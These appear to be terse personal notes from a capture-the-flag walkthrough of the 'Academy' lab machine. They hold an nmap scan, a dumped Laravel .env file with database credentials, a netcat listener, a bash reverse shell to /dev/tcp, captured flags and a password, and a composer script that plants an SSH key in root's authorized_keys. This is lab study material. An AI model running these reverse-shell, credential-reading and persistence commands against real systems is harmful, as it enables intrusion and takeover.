Academy

# Nmap 7.91 scan initiated Sun Nov 29 13:49:16 2020 as: nmap -sC -sV -Pn -oA Academy 10.10.10.215
Nmap scan report for 10.10.10.215
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE      VERSION
22/tcp open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open     http         Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://academy.htb/
88/tcp filtered kerberos-sec
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 29 13:54:29 2020 -- 1 IP address (1 host up) scanned in 312.78 seconds

Edit the hosts file

10.10.10.215 academy.htb

User privileges


Edit the hosts file again

10.10.10.215 academy.htb dev-staging-01.academy.htb

Found the keyword Laravel

Command ~> cat /var/www/html/academy/.env

APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

remote
nc -l 1234

local
bash -c 'bash -i >& /dev/tcp/10.10.15.XX/1234 0>&1'

b11122e303dae8ceeee215804f60a119


mrb3n_Ac@d3my!

{
  "scripts": {
    "command": "mkdir /root/.ssh; echo 'ssh-rsa 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 xiaming@bixin.cn' >> /root/.ssh/authorized_keys"
  }
}

e8065ea83707204ed3f153f94cbddbb7